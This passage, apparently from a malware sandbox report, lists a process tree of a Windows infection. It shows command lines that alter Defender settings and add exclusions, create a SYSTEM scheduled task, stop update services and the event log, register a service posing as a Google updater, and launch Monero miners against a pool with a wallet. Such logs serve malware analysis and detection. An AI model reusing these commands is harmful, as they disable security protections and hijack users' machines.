                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                              11⤵
                                                PID:5664
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                  12⤵
                                                    PID:5692
                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                      13⤵
                                                        PID:5704
                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                    11⤵
                                                      PID:5724
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                        12⤵
                                                          PID:5776
                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                            13⤵
                                                              PID:5808
                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                          11⤵
                                                            PID:5828
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                              12⤵
                                                                PID:5844
                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                  13⤵
                                                                    PID:5864
                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                11⤵
                                                                  PID:5892
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                    12⤵
                                                                      PID:5908
                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                        13⤵
                                                                          PID:5920
                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                      11⤵
                                                                        PID:6060
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                          12⤵
                                                                            PID:6092
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                              13⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:2224
                                                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                14⤵
                                                                                  PID:5972
                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                          10⤵
                                                                            PID:5176
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                              11⤵
                                                                                PID:5480
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                  12⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:1640
                                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                    13⤵
                                                                                      PID:5992
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 07:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS46D8.tmp\Install.exe\" it /ysFdidKjko 385118 /S" /V1 /F
                                                                                10⤵
                                                                                • Drops file in Windows directory
                                                                                • Creates scheduled task(s)
                                                                                PID:6068
                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
                                                                                10⤵
                                                                                  PID:1412
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                    11⤵
                                                                                      PID:4052
                                                                                      • \??\c:\windows\SysWOW64\schtasks.exe
                                                                                        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                        12⤵
                                                                                          PID:5408
                                                                                • C:\Users\Admin\Pictures\EjhcvZ2uxLAJM2iN0p97JSRc.exe
                                                                                  "C:\Users\Admin\Pictures\EjhcvZ2uxLAJM2iN0p97JSRc.exe"
                                                                                  8⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:5784
                                                                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                    9⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    PID:396
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                    9⤵
                                                                                      PID:5664
                                                                                      • C:\Windows\system32\wusa.exe
                                                                                        wusa /uninstall /kb:890830 /quiet /norestart
                                                                                        10⤵
                                                                                          PID:5940
                                                                                      • C:\Windows\system32\sc.exe
                                                                                        C:\Windows\system32\sc.exe stop UsoSvc
                                                                                        9⤵
                                                                                        • Launches sc.exe
                                                                                        PID:5584
                                                                                      • C:\Windows\system32\sc.exe
                                                                                        C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                        9⤵
                                                                                        • Launches sc.exe
                                                                                        PID:1144
                                                                                      • C:\Windows\system32\sc.exe
                                                                                        C:\Windows\system32\sc.exe stop wuauserv
                                                                                        9⤵
                                                                                        • Launches sc.exe
                                                                                        PID:3420
                                                                                      • C:\Windows\system32\sc.exe
                                                                                        C:\Windows\system32\sc.exe stop bits
                                                                                        9⤵
                                                                                        • Launches sc.exe
                                                                                        PID:3580
                                                                                      • C:\Windows\system32\sc.exe
                                                                                        C:\Windows\system32\sc.exe stop dosvc
                                                                                        9⤵
                                                                                        • Launches sc.exe
                                                                                        PID:5608
                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                        9⤵
                                                                                          PID:4348
                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                          9⤵
                                                                                            PID:6040
                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                            9⤵
                                                                                              PID:5956
                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                              9⤵
                                                                                                PID:5992
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
                                                                                                9⤵
                                                                                                • Launches sc.exe
                                                                                                PID:2976
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
                                                                                                9⤵
                                                                                                • Launches sc.exe
                                                                                                PID:3896
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                C:\Windows\system32\sc.exe stop eventlog
                                                                                                9⤵
                                                                                                • Launches sc.exe
                                                                                                PID:3472
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
                                                                                                9⤵
                                                                                                • Launches sc.exe
                                                                                                PID:5968
                                                                                            • C:\Users\Admin\Pictures\uyzcs13Iv4h6a1aWWVMGQuqt.exe
                                                                                              "C:\Users\Admin\Pictures\uyzcs13Iv4h6a1aWWVMGQuqt.exe"
                                                                                              8⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5124
                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS6404.tmp\Install.exe
                                                                                                .\Install.exe /tEdidDDf "385118" /S
                                                                                                9⤵
                                                                                                • Checks computer location settings
                                                                                                • Executes dropped EXE
                                                                                                PID:116
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                  10⤵
                                                                                                    PID:5760
                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                      11⤵
                                                                                                        PID:6056
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                          12⤵
                                                                                                            PID:6124
                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                              13⤵
                                                                                                                PID:4336
                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                            11⤵
                                                                                                              PID:5536
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                12⤵
                                                                                                                  PID:5224
                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                    13⤵
                                                                                                                      PID:5484
                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                  11⤵
                                                                                                                    PID:4396
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                      12⤵
                                                                                                                        PID:5716
                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                          13⤵
                                                                                                                            PID:5720
                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                        11⤵
                                                                                                                          PID:5436
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                            12⤵
                                                                                                                              PID:3816
                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                13⤵
                                                                                                                                  PID:3004
                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                              forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                              11⤵
                                                                                                                                PID:4164
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                  12⤵
                                                                                                                                    PID:5608
                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                      13⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      PID:5616
                                                                                                                                      • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                        14⤵
                                                                                                                                          PID:5852
                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                                                                  10⤵
                                                                                                                                    PID:5828
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                      11⤵
                                                                                                                                        PID:5656
                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                          12⤵
                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                          PID:3084
                                                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                            13⤵
                                                                                                                                              PID:5880
                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 07:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS6404.tmp\Install.exe\" it /iTpdidqJWo 385118 /S" /V1 /F
                                                                                                                                        10⤵
                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                        PID:2632
                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
                                                                                                                                        10⤵
                                                                                                                                          PID:2224
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                                                                            11⤵
                                                                                                                                              PID:3004
                                                                                                                                              • \??\c:\windows\SysWOW64\schtasks.exe
                                                                                                                                                schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                                                                                12⤵
                                                                                                                                                  PID:4724
                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                                                        7⤵
                                                                                                                                          PID:2336
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000045001\WinSec.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1000045001\WinSec.exe"
                                                                                                                                      5⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:4156
                                                                                                                                • C:\Users\Admin\1000006002\710992801b.exe
                                                                                                                                  "C:\Users\Admin\1000006002\710992801b.exe"
                                                                                                                                  3⤵
                                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                  PID:3768
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1000012001\installer.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1000012001\installer.exe"
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:3436
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4832 -ip 4832
                                                                                                                              1⤵
                                                                                                                                PID:4844
                                                                                                                              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                                                                1⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:4460
                                                                                                                                • C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
                                                                                                                                  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                                                                                                                                  2⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:4804
                                                                                                                                  • C:\Windows\Temp\743974.exe
                                                                                                                                    "C:\Windows\Temp\743974.exe" --list-devices
                                                                                                                                    3⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    PID:2920
                                                                                                                              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                                                                1⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:2844
                                                                                                                                • C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
                                                                                                                                  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                                                                                                                                  2⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:3184
                                                                                                                              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                                                                1⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:2848
                                                                                                                                • C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
                                                                                                                                  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                                                                                                                                  2⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:3656
                                                                                                                                  • C:\Windows\Temp\636450.exe
                                                                                                                                    "C:\Windows\Temp\636450.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
                                                                                                                                    3⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                    PID:2036
                                                                                                                                  • C:\Windows\Temp\203477.exe
                                                                                                                                    "C:\Windows\Temp\203477.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
                                                                                                                                    3⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                    PID:4024
                                                                                                                                  • C:\Windows\Temp\385808.exe
                                                                                                                                    "C:\Windows\Temp\385808.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
                                                                                                                                    3⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                    PID:4332
                                                                                                                                  • C:\Windows\Temp\204519.exe
                                                                                                                                    "C:\Windows\Temp\204519.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
                                                                                                                                    3⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                    PID:628
                                                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                                                C:\Windows\system32\WerFault.exe -pss -s 184 -p 1552 -ip 1552
                                                                                                                                1⤵
                                                                                                                                  PID:4932
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                                                                                                  1⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:628
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                  1⤵
                                                                                                                                    PID:1336
                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                    1⤵
                                                                                                                                      PID:4812
                                                                                                                                    • C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                                                                                      C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                                                                                      1⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      PID:5336
                                                                                                                                      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                        2⤵
                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        PID:5356
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                        2⤵
                                                                                                                                          PID:5864
                                                                                                                                          • C:\Windows\system32\wusa.exe
                                                                                                                                            wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                            3⤵
                                                                                                                                              PID:5156
                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                            C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                            2⤵
                                                                                                                                            • Launches sc.exe
                                                                                                                                            PID:5932
                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                            C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                            2⤵
                                                                                                                                            • Launches sc.exe
                                                                                                                                            PID:5860
                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                            C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                            2⤵
                                                                                                                                            • Launches sc.exe
                                                                                                                                            PID:364
                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                            C:\Windows\system32\sc.exe stop bits
                                                                                                                                            2⤵
                                                                                                                                            • Launches sc.exe
                                                                                                                                            PID:5152
                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                            C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                            2⤵
                                                                                                                                            • Launches sc.exe
                                                                                                                                            PID:5856
                                                                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                                                                            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                            2⤵
                                                                                                                                              PID:904
                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                              2⤵
                                                                                                                                                PID:1500
                                                                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                                                                C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                2⤵
                                                                                                                                                  PID:5624
                                                                                                                                                • C:\Windows\system32\powercfg.exe
                                                                                                                                                  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                  2⤵
                                                                                                                                                    PID:5632
                                                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                                                    C:\Windows\system32\conhost.exe
                                                                                                                                                    2⤵
                                                                                                                                                      PID:1248
                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                      explorer.exe
                                                                                                                                                      2⤵
                                                                                                                                                        PID:5728
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS46D8.tmp\Install.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7zS46D8.tmp\Install.exe it /ysFdidKjko 385118 /S
                                                                                                                                                      1⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                      PID:5392
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
